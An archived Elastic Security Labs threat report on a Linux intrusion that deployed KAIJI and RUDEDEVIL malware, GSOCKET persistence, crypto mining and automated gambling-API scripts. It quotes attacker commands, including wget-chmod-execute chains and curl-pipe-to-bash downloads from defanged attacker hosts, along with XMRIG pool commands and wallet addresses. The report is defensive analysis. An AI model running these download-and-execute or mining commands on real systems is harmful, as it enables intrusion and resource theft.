{
	"id": "d4d90004-f61b-42cd-a752-b019d0c1f7af",
	"created_at": "2026-04-10T03:20:41.632288Z",
	"updated_at": "2026-04-10T03:22:18.304182Z",
	"deleted_at": null,
	"sha1_hash": "21255dabf13b81070819344ae2b82e9d6ebe0573",
	"title": "Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18814817,
	"plain_text": "Betting on Bots: Investigating Linux malware, crypto mining, and\r\ngambling API abuse\r\nBy Remco Sprooten, Ruben Groenewoud\r\nPublished: 2024-09-27 · Archived: 2026-04-10 02:20:18 UTC\r\nIntroduction\r\nIn recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers.\r\nThe attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access the threat\r\nactors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.\r\nThe threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, telegram bots\r\nfor communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as\r\nKAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a\r\ncryptocurrency miner, were used to exploit system resources for malicious purposes.\r\nOur investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers\r\nmight be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted\r\ndaily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the\r\nmalware authors.\r\nThis research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers'\r\ntactics, techniques, and procedures. We explore how they established initial access, the methods used for persistence and\r\nprivilege escalation, and the malware deployed at each stage. Additionally, we discuss the command and control\r\ninfrastructure, including the use of GSOCKET and Telegram for stealthy communication.\r\nExecution flow\r\nInitial access\r\nOur team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server\r\nrunning Apache2. Evidence of this compromise is seen in the execution of the id command via the Apache2 process, after\r\nwhich we see the threat actor exploiting the web server and deploying KAIJI malware under the www-data user account.\r\nShortly after the Kaiji deployment, the attacker used the www-data account to download a script named 00.sh from the\r\nURL http://61.160.194[.]160:35130 , which, after further investigation, also hosted several versions of RUDEDEVIL\r\nmalware.\r\n00.sh is a stager that:\r\nSets its default shell and PATH.\r\nDeletes several log files to erase traces of execution.\r\nLeverages ps , netstat , lsof and a list of common mining process names to kill any potential mining\r\ncompetition on the compromised host.\r\nFlushes the iptables rules on the host, sets several iptables rules to block connections to specific destination\r\nports and mining pools, and disables iptables .\r\nFinally, a second stage ( sss6 / sss68 ) is downloaded and executed, and execution traces are erased.\r\nThe figure below shows a compressed version of the stager. Lines annotated with [...] are shortened to enhance\r\nreadability.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 1 of 26\n\nCompressed version of the 00.sh stager\r\nFileserver\r\nVia the backdoored web server process, the attacker downloaded and executed malware through the following command:\r\nsh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 7\r\nThe l64 and l86 files are downloaded from http://107.178.101[.]245:5488 , after which they are granted all\r\npermissions, executed, and removed. Looking at the server that is hosting these malware samples, we see the following:\r\nRejetto File Server Hosting Several Pieces of Malware\r\nThis seems to be a file server, hosting several types of malware for different architectures. The file server leverages the\r\nRejetto technology. These malwares have upload dates and download counters. For example, the download.sh file that was\r\nuploaded September 10th, was already downloaded 3,100 times.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 2 of 26\n\nDownload Counter Indicating 3000+ Downloads Within 2 Weeks of Upload\r\nRUDEDEVIL/LUCIFER\r\nUpon closer inspection, the file sss6 , which was downloaded and executed, has been identified as the RUDEDEVIL\r\nmalware. Early in the execution process, we encounter an embedded message characteristic of this malware family:\r\nRUDEDEVIL Malware Characteristic\r\nHi, man. I\\'ve seen several organizations report my Trojan recently,\r\nPlease let me go. I want to buy a car. That\\'s all. I don\\'t want to hurt others.\r\nI can\\'t help it. My family is very poor. In China, it\\'s hard to buy a suite.\r\nI don\\'t have any accommodation. I don\\'t want to do anything illegal.\r\nReally, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxs\r\nthank yo\r\nWe note that the files l64 and l86 that are hosted on the file server contain the same malware. When analyzing the\r\nexecution flow of the malware we see that the main function of the malware performs several key tasks:\r\nDaemon Initialization: The process is converted into a daemon using daemon(1, 0) .\r\nSocket Creation: A socket is created and bound to a specific port.\r\nSignal Handling: Custom signal handlers are set up for various signals.\r\nService Initialization: Several services are started using SetFILE .\r\nPrivilege Handling: It checks for root privileges and adjusts resource limits accordingly.\r\nDecryption: The malware decrypts its configuration blobs.\r\nThread Creation: Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and\r\nCPU usage.\r\nMain Loop: The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified\r\nduration.\r\nWhen examining the encryption routine, we find it utilizes XOR-based encoding:\r\nDareDevil Encryption Routine\r\nTo decode the contents statically, we developed a basic Python snippet:\r\ndef DecryptData(data_block, encryption_key):\r\n key_modifier = encryption_key \u0026 0xFF\r\n key_index = key_modifier // 0x5F # 0x5F = 95 in decimal\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 3 of 26\n\nmodifier = (key_modifier - (key_index * 0x5F)) + 0x58 # 0x58 = 88 in decimal\r\n for i in range(len(data_block)):\r\n data_block[i] ^= modifier\r\n data_block[i] \u0026= 0xFF # Ensure 8-bit value\r\n data_block[i] += modifier\r\n data_block[i] \u0026= 0xFF # Ensure 8-bit value\r\n return data_block\r\n# Encoded data as hex strings\r\nencoded_data = [\r\n '4c494356515049490c467978',\r\n '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d3726434\r\n '0f424d4e0f435536575649484b',\r\n '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b',\r\n]\r\nencryption_key = 0x03FF # 1023 in decimal\r\n# Process and decrypt each encoded data string\r\nfor data in encoded_data:\r\n # Convert hex string to list of integers\r\n data_bytes = bytes.fromhex(data)\r\n data_block = list(data_bytes)\r\n # Decrypt the data\r\n decrypted_block = DecryptData(data_block, encryption_key)\r\n # Convert decrypted data back to bytes\r\n decrypted_bytes = bytes(decrypted_block)\r\n print(\"Decrypted text:\", decrypted_bytes.decode('utf-8', errors='ignore'))\r\nAfter decoding the configuration, the following values are revealed:\r\nThe first value C2 domain nishabii[.]xyz .\r\nThe second value reveals options that will be passed to XMRIG.\r\nThe third value shows the temp file location the malware uses.\r\nThe fourth and last string shows the download location for the XMRIG binary.\r\nThread Management in the Malware\r\nThe malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail.\r\nUnderstanding the KillPid Function\r\nOne of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function\r\nbegins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters\r\nan infinite loop, repeatedly executing its tasks.\r\nAt the heart of its functionality is an array called sb_name , which contains the names of processes the malware wants to\r\nterminate.\r\nRUDEDEVIL kill process array\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 4 of 26\n\nEvery two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using\r\na helper function called getPidByName . After each iteration, it moves to the next process in the list, ensuring all processes\r\nin sb_name are handled.\r\nInterestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10\r\nminutes — before resuming its process checks. This extended sleep period is likely implemented to conserve system\r\nresources, ensuring the malware doesn't consume too much CPU time while monitoring processes.\r\nUnderstanding the Get_Net_Messages Function\r\nAnother crucial thread is responsible for monitoring network traffic, specifically focusing on the eth0 network interface.\r\nThis functionality is handled by the getOutRates function. The function begins by setting up necessary variables and\r\nopening the /proc/net/dev file, which contains detailed network statistics for each interface.\r\nGetting network rates from /proc/net/dev\r\nIf the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the\r\nrelevant network statistics. It specifically looks for the eth0 interface, parsing the output rate data using a standard string\r\nparsing method. If successful, the function returns the output rate for eth0 ; otherwise, it returns 0 , ensuring the malware\r\ncontinues functioning even if an error occurs.\r\nThis routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being\r\nsent or received across the interface.\r\nUnderstanding the Get_Cpu_Message Function\r\nFor CPU monitoring, the malware uses the GetCpuRates function. This function continuously monitors the CPU usage by\r\nreading data from /proc/stat . Similar to how the network data is handled, the CPU statistics are read and parsed,\r\nallowing the malware to calculate the system's CPU usage.\r\nGetting CPU information from /proc/stat\r\nThe function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system.\r\nIf the file cannot be opened for some reason, the function logs an error and gracefully exits. However, as long as it’s able to\r\nread the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance.\r\nUnderstanding the Send_Host_Message Function\r\nPerhaps the most critical thread is the one responsible for sending system information back to the malware operators. The\r\n_SendInfo function performs this task by collecting data about the infected system’s CPU and network usage. It begins by\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 5 of 26\n\nsetting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU\r\nand network usage into a string.\r\nSending system info back to the C2\r\nAdditionally, the function checks whether a particular process is running on the system and adjusts its formatted message\r\naccordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection.\r\nIn essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load\r\nand network activity. The operators can use this information to assess the status of their infection and adjust their activities\r\nas needed.\r\nConnecting to the Command-and-Control (C2) Server\r\nOnce all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. This is\r\nmanaged by the ConnectServer function in the main thread, which handles communication with the server and executes\r\ncommands remotely.\r\nUnderstanding the ConnectServer Function\r\nThe first task the ConnectServer function performs is establishing a connection to the C2 server using ServerConnectCli .\r\nAfter successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection\r\nremains stable over extended periods of time.\r\nOnce the connection is set up, the malware collects various pieces of system information, including the hostname, user\r\ninformation, CPU specs, and memory details. This information is then sent to the server as an initial data payload, providing\r\nthe attackers with a detailed view of the infected machine.\r\nAfter this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The\r\ntypes of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues\r\nindefinitely, ensuring that the malware is ready to execute any command sent by its operators.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 6 of 26\n\nWhen the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the\r\nsocket, ending the session with the server.\r\nCommand-and-Control (C2) Commands\r\nThe ConnectServer function processes a variety of commands from the C2 server, each designed to control a different\r\naspect of the infected system. Here’s a breakdown of the commands handled by the malware:\r\nCase 4: The malware calls the DealwithDDoS function, likely initiating a Distributed Denial of Service (DDoS)\r\nattack.\r\nCase 5: Sets the StopFlag to 1 , which could signal the malware to stop specific tasks.\r\nCase 6: Downloads a file from the server using http_get , changes its permissions, and then executes it. This\r\ncommand allows the attackers to run additional malware or scripts on the infected machine.\r\nCase 7: Executes a system command using the system function, providing the attackers with direct control over the\r\nsystem’s command line.\r\nCase 8: Sets StopCpu to 0 , restarting any previously halted CPU tasks.\r\nCase 9: Sets StopCpu to 1 , halting all CPU tasks.\r\nCase 0xA: Updates the CPU mining configuration with new data and retrieves the PID of the current process,\r\nallowing the malware to modify its cryptocurrency mining operations.\r\nCase 0xB: Sets stopxmr to 1 , effectively stopping the XMRIG miner.\r\nCase 0xC: Resets stopxmr to 0 and retrieves the current process PID, resuming the mining activity.\r\nProcessing of C2 commands\r\nEach command gives the malware operators precise control over how the infected machine behaves, whether it’s\r\nparticipating in a DDoS attack, running new malware, or managing mining operations.\r\nVariants of RUDEDEVIL Malware and XMRIG Configuration\r\nWhile the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being\r\nuploaded. The core functionality of these versions remained largely the same, with the only significant variation being the\r\nembedded XMRIG commands used for cryptocurrency mining.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 7 of 26\n\nEach version of the malware was configured to connect to the same mining pool, c3pool.org , but with slight differences in\r\nthe parameters passed to the XMRIG miner:\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php\r\n-o stratum+tcp://auto.c3pool[.]org:19999 -u\r\n42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0\r\nEach of these commands directs the miner to connect to the same mining pool but specifies different wallets or\r\nconfigurations. By examining the c3pool application, we confirmed that both XMR addresses associated with these\r\ncommands are currently active and mining.\r\nC3pool mining revenue\r\nAdditionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns,\r\nhighlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining\r\noperations.\r\nGSOCKET\r\nTo establish persistence, the threat actor downloaded and installed GSOCKET, a network utility designed to enable\r\nencrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent\r\nconnections through the Global Socket Relay Network (GSRN). This open-source tool includes features like AES-256\r\nencryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for\r\nencrypted file transfers, remote command execution, and even the creation of hidden services.\r\nAlthough GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.\r\nOnce deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the\r\nsystem for active kernel processes to decide which process it will masquerade as:\r\nGSOCKET Kernel Process Masquerading\r\nIt then creates the /dev/shm/.gs-1000 directory to download and store its binary in shared memory. Additionally, by\r\ndefault, it sets up an /htop directory under /home/user/.config/htop/ to store both the GSOCKET binary and the secret\r\nkey used for its operations.\r\nNext, a cron job that runs the GSOCKET binary with the secret key every minute is set up.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 8 of 26\n\nGSOCKET Crontab Persistence\r\nThe binary is executed under the name of a kernel process using the exec -a [process_name] command, further enhancing\r\nthe ability to evade detection. The cron job includes a base64 encoded command that, when decoded, ensures the persistence\r\nmechanism is regularly executed and disguised as a legitimate kernel process:\r\nWhen decoding the payload, we see how the defunct.dat secret key is used as an argument to execute the defunct\r\nbinary, which is masqueraded as [raid5wq] through the use of exec -a command:\r\nIn addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run\r\ncontrol ( rc.local ) and Systemd. GSOCKET enumerates potential persistence locations:\r\nGSOCKET Persistence Technique Enumeration\r\nGSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and\r\nnotifications:\r\nGSOCKET Webhook Capabilities\r\nFinally, after installation, GSOCKET ensures that all files that are created or modified, will be timestomped to attempt to\r\nerase any trace of installation:\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 9 of 26\n\nGSOCKET Timestomping Capability\r\nThese features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign,\r\nGSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection.\r\nAdditionally, a PHP payload was fetched from an external IP and saved as 404.php , likely functioning as a backdoor for\r\nfuture access. We did not manage to obtain this payload.\r\nPost compromise dwell time\r\nAfter a three-week period of quiet with no noticeable activity, the threat actors resumed operations by utilizing the built-in\r\nPython3 to establish a reverse connection to a new command-and-control server.\r\nAfter regaining access to the host, a newer version of the KAIJI malware was deployed.\r\nKAIJI malware: a comparison to previous samples\r\nWhile investigating the files on the discovered file server, we saw a shell script. This shell script seems to be the main file\r\nused to download by an earlier stage, ensuring the correct architecture for the victim is used.\r\nKAIJI Download.sh Script\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 10 of 26\n\nThe same Shell script is found in other reports where this script is used to deploy KAIJI.\r\nAs part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with\r\nsamples identified by Black Lotus Labs in 2022. Their detailed analysis of Chaos (KAIJI) can be found in their blog post\r\nhere.\r\nUsing BinDiff, a binary comparison tool, we compared the functions in the binaries. The analysis revealed that the code in\r\nour sample was identical to the previously identified KAIJI sample from 2022.\r\nBindiff for Old and New Version of KAIJI\r\nAlthough the code was the same, one critical difference stood out: the C2 server address. Although the functionality\r\nremained consistent in both binaries, they pointed to different C2 domains.\r\nDelving deeper into the disassembly, we identified a function named main_Link . This function is responsible for decoding\r\nthe C2 server address used by the malware.\r\nKAIJI main_link Function\r\nOnce decoded, the function searches for the |(odk)/*- postfix in the address and removes it, leaving only the C2 domain\r\nand port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change\r\nbetween samples.\r\nGiven that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed\r\nlook at its behaviors.\r\nKAIJI Dynamic Analysis - Part 1\r\nAfter execution, KAIJI creates several files in the /etc/ and /dev/ directories, /etc/id.services.conf , /etc/32678 ,\r\n/dev/.img and /dev/.old . These scripts are places to establish persistence.\r\nTwo services are set up, /etc/init.d/linux_kill and crond.service . crond.service is executed by Systemd, while\r\nlinux_kill is used for SysVinit persistence.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 11 of 26\n\nAfter reloading the Systemd daemon, the first network connection to the C2 is attempted.\r\nKAIJI Dynamic Analysis - Part 2\r\nNext, the Systemd Late generator service file is created. More information on the workings of Systemd , and different\r\nways of establishing persistence through this method can be found in our recent blog series dubbed Linux Detection\r\nEngineering - A primer on persistence mechanisms.\r\nKAIJI creates the /boot/System.img.config file, which is an executable that is executed through the previously deployed\r\nSystemd services. This binary, is amongst other binaries, another way of establishing persistence.\r\nKAIJI Dynamic Analysis - Part 3\r\nNext, KAIJI adjusts the SELinux policies to allow unauthorized actions. It searches audit logs for denied operations related\r\nto System.img.conf , generates a new SELinux policy to permit these actions, and installs the policy with elevated\r\npriority. By doing this, the malware bypasses security restrictions that would normally block its activity.\r\nAdditionally, it sets up multiple additional forms of persistence through bash profiles, and creates another two malicious\r\nartifacts; /usr/lib/libd1rpcld.so and /.img .\r\nRight after, /etc/crontab is altered through an echo command, ensuring that the /.img file is executed by root on a set\r\nschedule.\r\nKAIJI Dynamic Analysis - Part 4\r\nKAIJI continues to move several default system binaries to unusual locations, attempting to evade detection along the way.\r\nKAIJI Dynamic Analysis - Part 5\r\nKAIJI uses the renice command to grant PID 2957 , one of KAIJI's planted executables, the highest possible priority (on\r\na scale of -20 to 19, lowest being the highest priority), ensuring it gets more CPU resources than other processes.\r\nTo evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities\r\nby manipulating how directories are mounted and viewed within the system.\r\nFinally, we see a trace of cron executing the /.img , which was planted in the /etc/crontab file earlier.\r\nThe saga continues\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 12 of 26\n\nTwo weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the www-data user\r\nthrough the Apache2 process using the command:\r\nsh -c wget http://91.92.241[.]103:8002/gk.php\r\nThe contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the\r\nattackers deploying pspy64 . Pspy is a command-line tool for process snooping on Linux systems without requiring root\r\npermissions. It monitors running processes, including those initiated by other users, and captures events like cron job\r\nexecutions. This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing\r\nthe commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for\r\nreconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities.\r\nNotably, pspy64 was executed by the [rcu_preempt] parent, indicating that the threat actors had transitioned from\r\nleveraging the web server backdoor to using the GSOCKET backdoor.\r\nFurther attempts at privilege escalation involved exploiting CVE-2021-4034 , also known as pwnkit . This vulnerability\r\naffects the pkexec component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute\r\narbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially\r\nleading to full control over the affected machine.\r\nCustom built binaries\r\nRight after, the attackers attempted to download a custom-built malware named apache2 and apache2v86 from:\r\nhttp://62.72.22[.]91/apache2\r\nhttp://62.72.22[.]91/apache2v86\r\nWe obtained copies of these files, which currently have zero detections on VirusTotal. However, when executing them\r\ndynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over\r\na week, the threat actor attempted to alter, upload and execute these binaries more than 15 times, but due to repeated\r\nsegfaults, it is unlikely that they succeeded in running this custom malware.\r\nWhile the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several\r\nXOR-encoded strings within the samples.\r\nApache2 XOR-Encoded Strings\r\nThe XOR key used to encode the strings was identified as 0x79 (or the character y ). After decoding the strings, we\r\ndiscovered fragments of an HTTP request header that the malware was attempting to construct:\r\n/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1\r\nsec-ch-ua: \"Chromium\";v=\"122\", \"Google Chrome\";v=\"122\", \"Not-A.Brand\";v=\"99\r\nsec-ch-ua-platform: \"Windows\"\r\nupgrade-insecure-requests: 1\r\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signe\r\nreferer: https://twitter[.]com\r\naccept-language: ru,en-US;q=0.9\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.\r\nThis indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature\r\nof the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 13 of 26\n\noperational.\r\nAdditional reconnaissance\r\nThe attackers continued to use tools from The Hacker’s Choice, by downloading and executing whatserver.sh .\r\nThis Shell script is designed to gather and display server information. It extracts details such as the fully qualified domain\r\nnames (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like\r\nCPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities,\r\nincluding last logged-in users and currently listening services.\r\nMining activities\r\nAfter nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely\r\nhaving failed to gain root access. Instead, they established persistence as the www-data user, leveraging GSOCKET to set\r\nup an SSL connection, which was disguised as a kernel process called [mm_percpu_wq] .\r\nAfter decoding the base64 contents, we get a very familiar looking output:\r\nThrough our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly\r\ninto the crontab.\r\nThis command tries to download http://gcp.pagaelrescate[.]com:8080/ifindyou every minute, and pipe it to bash.\r\nLooking at the contents of ifindyou , we see the following Bash script:\r\nStage 1 - ifindyou.sh\r\nThis script gathers hostname and IP information, downloads the SystemdXC archive from\r\nhttp://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC (XMRIG), stores this in /tmp/SystemdXC , extracts the archive\r\nand executes it with the necessary parameters to start mining Bitcoin.\r\nWhen examining the mining command, we can see how the malware configures XMRIG:\r\nThis command connects to the unmineable.com mining pool, using the infected machine’s hostname as an identifier in the\r\nmining process. At the time of writing, there are 15 active workers mining Bitcoin for the wallet address\r\n1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz .\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 14 of 26\n\nBitcoin Address Lookup\r\nUpon further investigation into the Bitcoin address, we found that this address has performed a single transaction.\r\nBitcoin Transaction\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 15 of 26\n\nInterestingly, the output address for this transaction points to a well-known hot wallet associated with Binance, indicating\r\nthat the attackers may have transferred their mining earnings to an exchange platform.\r\nBinance Wallet Destination\r\nWhen returning our focus back to the script, we also see two commands commented out, which will become more clear\r\nlater. The script executes:\r\ncurl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash\r\nLooking at this payload, we can see the following contents:\r\nStage 2 - cycnet.sh\r\nThis stage checks the output of the command, and sends this to a Telegram chat bot. Through our Telegram behavioral rule,\r\nwe can see that a Telegram POST request looks like this:\r\nThe cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes:\r\ncurl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3\r\nThe downloaded Python script automates interactions with an online gambling game through HTTP requests. The script\r\nincludes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server.\r\nUpon closer examination, we identified the following key components of the script:\r\nGlobal Variables:\r\nusuario : Stores the user ID for managing the session.\r\napuesta : Represents the bet amount.\r\nganancias : Tracks the winnings and losses.\r\nsaldo_actual : Holds the current account balance.\r\nenviador_slot Global Variables\r\nUnderstanding the obteneruid Function\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 16 of 26\n\nThis function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote\r\nserver. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful\r\nauthentication, it returns a session UUID, which is used for further interactions in the game.\r\nenviador_slot obteneruid Function\r\nUnderstanding the enviardatos Function\r\nThis function sends game data or status updates back to gcp.pagaelrescate[.]com , logging the results or actions taken\r\nduring gameplay. It uses a simple GET request to transmit this data to the remote server.\r\nenviador_slot enviardatos Function\r\nUnderstanding the hacerjugada Function\r\nThe hacerjugada function simulates the betting process for a set number of rounds. It sends POST requests to place bets,\r\nupdates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls\r\ncompletarbono() to handle any bonus game details. Between each betting round, the function enforces a 30-second delay\r\nto mimic natural gameplay and avoid detection.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 17 of 26\n\nenviador_slot hacerjugada Function\r\nUnderstanding the completarbono Function\r\nWhen a bonus round is triggered, this function completes the round by sending a request containing the session ID and\r\nround ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is\r\nsent back to the remote server using the enviardatos() function.\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 18 of 26\n\nenviador_slot completarbono Function\r\nLikely Used for Testing Purposes\r\nIt’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the\r\ngambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find\r\nvulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their\r\napproach, potentially in preparation for more sophisticated or widespread attacks.\r\nREF6138 through MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks. During this investigation, we identified the following tactics, techniques\r\nand sub-techniques:\r\nMITRE ATT\u0026CK tactics, techniques and sub-techniques used\r\nTactic Technique Sub-Technique\r\nResource\r\nDevelopment\r\nT1587: Develop Capabilities Malware\r\nT1588: Obtain Capabilities Tool\r\nT1608: Stage Capabilities Upload Malware\r\nUpload Tool\r\nInitial Access T1190: Exploit Public-Facing Application\r\nExecution T1059: Command and Scripting Interpreter Unix Shell\r\nPython\r\nT1053: Scheduled Task/Job Cron\r\nPersistence T1546: Event Triggered Execution Unix Shell Configuration Modification\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 19 of 26\n\nTactic Technique Sub-Technique\r\nT1053: Scheduled Task/Job Cron\r\nT1505: Server Software Component Web Shell\r\nPrivilege Escalation\r\nT1068: Exploitation for Privilege\r\nEscalation\r\nDefense Evasion\r\nT1140: Deobfuscate/Decode Files or\r\nInformation\r\nT1222: File and Directory Permissions\r\nModification\r\nLinux and Mac File and Directory Permissions\r\nModification\r\nT1564: Hide Artifacts Hidden Files and Directories\r\nT1070: Indicator Removal Timestomp\r\nT1036: Masquerading Masquerade Task or Service\r\nT1027: Obfuscated Files or Information Software Packing\r\nStripped Payloads\r\nCommand Obfuscation\r\nEncrypted/Encoded File\r\nDiscovery T1057: Process Discovery\r\nT1082: System Information Discovery\r\nT1061: System Network Configuration\r\nDiscovery\r\nT1049: System Network Connections\r\nDiscovery\r\nT1007: System Service Discovery\r\nCollection T1119: Automated Collection\r\nT1005: Data from Local System\r\nCommand and\r\nControl\r\nT1071: Application Layer Protocol Web Protocols\r\nT1132: Data Encoding Standard Encoding\r\nT1001: Data Obfuscation\r\nT1573: Encrypted Channel Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nT1572: Protocol Tunneling\r\nT1102: Web Service\r\nImpact T1496: Resource Hijacking\r\nDetecting REF6138\r\nElastic Security implements a multi-layer approach to threat detection, leveraging behavioral SIEM and Endpoint rules,\r\nYARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic\r\nSecurity that play a big role in capturing the identified threats.\r\nDetection\r\nThe following detection rules were observed throughout the analysis of this intrusion set:\r\nSegfault Detection\r\nTimestomping using Touch Command\r\nhttps://www.elastic.co/security-labs/betting-on-bots\r\nPage 20 of 26\n\nShell Configuration Creation or Modification\r\nSystem Binary Moved or Copied\r\nPrevention\r\nThe following behavior prevention events were observed throughout the analysis of this intrusion set:\r\nLinux Reverse Shell via Suspicious Utility\r\nDefense Evasion via Bind Mount\r\nLinux Suspicious Child Process Execution via Interactive Shell\r\nPotential Linux Hack Tool Launched\r\nPrivilege Escalation via 